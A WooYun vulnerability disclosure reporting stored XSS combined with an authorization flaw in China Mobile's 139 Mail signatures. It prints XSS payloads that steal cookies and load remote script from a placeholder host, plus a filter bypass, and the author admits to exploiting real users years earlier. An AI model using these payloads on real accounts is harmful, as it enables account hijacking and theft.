当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0187787

漏洞标题:中国移动139邮箱存在漏洞可以控制百万账户

相关厂商:中国移动

漏洞作者: px1624

提交时间:2016-03-22 19:00

修复时间:2016-05-09 17:41

公开时间:2016-05-09 17:41

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-22: 细节已通知厂商并且等待厂商处理中
2016-03-25: 厂商已经确认,细节仅向厂商公开
2016-04-04: 细节向核心白帽子及相关领域专家公开
2016-04-14: 细节向普通白帽子公开
2016-04-24: 细节向实习白帽子公开
2016-05-09: 细节向公众公开

简要描述:

和上一个发的139邮箱的漏洞一样,存了2年了,还没被发现,呵呵。不过这个比上个危害大的多了!

详细说明:

审核人员复现漏洞千万要记住,不要用alert prompt等关键字额,免得厂商还没处理,又被干掉了!
漏洞是利用储存型XSS+越权,可以控制百万的帐号,可以对帐号进行发短信,发邮件等操作。
最重要的是很隐蔽,难以被用户察觉,而且无需交互,就可以给大量用户埋下持久的XSS后门!
1 先说说漏洞点,在邮件的签名的编辑签名的位置,记得勾选上设置为默认。

0.jpg


2 编辑邮件前面,抓包,如下图。

1.jpg


3 post包是一个object,其中id位置是签名的id,也就是说,现在已经有600多万的有效签名了。
然后这个id是存在越权问题的,可以被越权修改他人的签名的权限。
然后content的位置就是签名的内容,是存在储存型XSS漏洞的。
虽然说这个XSS只能X自己,但是配合越权漏洞后,威力就可以插别人了!而且还是百万用户~
XSS poc:

<img src=x onerror=alert(1)>
<iframe style=display:none src=x onerror=alert(document.cookie)>
<iframe style=display:none src=x onerror=jQuery.getScript('//xxx/js')>


4 可以看到,这个XSS的触发点特别多,由于139邮箱的设计,其中有一段js文件,会在每个页面都加载 收件箱、邮件列表、还有个人签名的信息,所以会导致所有页面都会触发这个XSS!而且还是大概3-5分钟就会重新加载一次,也就是说如果保持页面不动,XSS每3-5分钟就会又触发一次。
点击写信,触发。

2.jpg


邮箱首页触发~

3.jpg


4.jpg


发短信的页面也会触发。利用xss可以给任意手机号以中招者的身份发短信~

5.jpg


5 然后正当我准备提交漏洞的时候,发现XSS漏洞竟然被修补了。然后想了想,肯定是因为139邮箱的自动回传检测修补机制干的,因为在前面截图证明的时候,把这玩意给忘了,所以使用了alert,导致被发现然后被修了,应该是自动检测修补机制吧。
那么没办法了,只能临时再去绕一绕了。
不一会儿,就绕过了,毕竟是自动只能修补,肯定只是会过滤上传的测试代码,不然也会影响业务的。
绕过后的XSS poc如下,很简单,换个标签就可以了。

<input onfocus=jQuery.getScript('//xxx/js') autofocus>


6 看看效果。

6.jpg


点击写信按钮。

7.jpg


首页也有加载我的js。

8.jpg


收件箱也是。

9.jpg


收个cookie截图下吧。

10.jpg


6 最后,再说说怎么利用,如下,固定写好xss代码,然后遍历去跑id就可以了。

11.jpg


然后根据不同时段的需求,去改js文件中的代码就可以了。
至于中招率,我2年前去遍历过1w个id,然后1天内有大概3k个左右的手机号中招了(手机号有进行去重过滤处理),所以中招率还是蛮高的。

漏洞证明:

如上描述。

修复方案:

1 修补越权漏洞。
2 修补XSS漏洞。
3 还有个问题也要说明下,我2年前发现漏洞的时候,这个id只有160w左右,现在已经涨到了600w+了,还是蛮快的!

版权声明:转载请注明来源 px1624@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2016-03-25 17:41

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无


漏洞评价:

评价

  1. 2016-03-22 19:05 | hecate ( 普通白帽子 | Rank:810 漏洞数:127 | ®高级安全工程师 | WooYun认证√)

    first

  2. 2016-03-22 19:09 | 90Snake ( 普通白帽子 | Rank:167 漏洞数:53 | 人如果没有梦想,跟咸鱼有什么分别)

    两年

  3. 2016-03-22 19:11 | YY-2012 ( 核心白帽子 | Rank:3774 漏洞数:724 | 意淫,是《红楼梦》原创的词汇,但后来演变...)

    xss就xss

  4. 2016-03-22 19:23 | px1624 ( 普通白帽子 | Rank:1117 漏洞数:194 | px1624)

    @YY-2012 xss 越权,组合利用。

  5. 2016-03-22 19:50 | 带我玩 ( 路人 | Rank:16 漏洞数:8 | 带我玩)

    居然是两年没公开..这个数据你是获取暴利了>?

  6. 2016-03-22 20:03 | 暴走 ( 普通白帽子 | Rank:597 漏洞数:106 | 专心补刀。)

    xss就xss

  7. 2016-03-22 21:43 | 小龙 ( 普通白帽子 | Rank:2266 漏洞数:481 | 我就问,还有谁!!!!!!!!!!!!!...)

    旁总又暴走了

  8. 2016-03-22 23:00 | px1624 ( 普通白帽子 | Rank:1117 漏洞数:194 | px1624)

    @小龙 不知不觉rank已经被你拉开这么多了。。。

  9. 2016-03-22 23:00 | px1624 ( 普通白帽子 | Rank:1117 漏洞数:194 | px1624)

    @暴走 xss+越权~

  10. 2016-03-22 23:37 | Jason ( 路人 | Rank:0 漏洞数:1 | 我是来打酱油的!~~~)

    139邮箱漏洞非常多的

  11. 2016-03-23 11:22 | 小龙 ( 普通白帽子 | Rank:2266 漏洞数:481 | 我就问,还有谁!!!!!!!!!!!!!...)

    @px1624 旁总追我还不难吗…… 分分钟就超过我了……